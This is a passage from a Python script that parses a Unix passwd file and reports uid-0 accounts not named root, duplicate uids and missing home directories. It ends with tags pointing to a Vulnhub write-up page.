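        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "passwd": pw, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return entries


def rogue_root_accounts(text):
    """Every account that resolves to uid 0 without being named root."""
    return [e["name"] for e in parse_passwd(text) if e["uid"] == 0 and e["name"] != "root"]


def duplicate_uids(text):
    """uid -> account names, for uids shared by more than one account (useradd -o)."""
    by_uid = {}
    for e in parse_passwd(text):
        by_uid.setdefault(e["uid"], []).append(e["name"])
    return {uid: names for uid, names in by_uid.items() if len(names) > 1}


def missing_homes(text, exists=os.path.isdir):
    """Login-capable accounts whose home directory is absent (useradd without -m)."""
    return [e["name"] for e in parse_passwd(text)
            if not e["shell"].endswith(("nologin", "false")) and not exists(e["home"])]


def audit(text, exists=os.path.isdir):
    """Bundle the three checks into one report; any non-empty value is a finding."""
    return {"rogue_root": rogue_root_accounts(text),
            "duplicate_uids": duplicate_uids(text),
            "missing_homes": missing_homes(text, exists)}


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else "/etc/passwd"
    with open(path) as fh:
        report = audit(fh.read())
    for key, value in report.items():
        print(f"{key}: {value}")
    sys.exit(1 if any(report.values()) else 0)
```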
Tags: Ino, Vulnhub, target machine, md5 From: https://www.cnblogs.com/jason-huawen/p/16925514.html